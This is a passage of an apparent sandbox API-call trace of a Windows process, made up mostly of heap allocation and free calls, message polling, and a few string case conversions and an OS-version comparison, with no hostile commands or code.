(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.734] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.734] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0200.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.735] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.735] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.736] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.736] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.737] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.739] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.739] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.741] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.741] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.742] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.742] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.742] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | 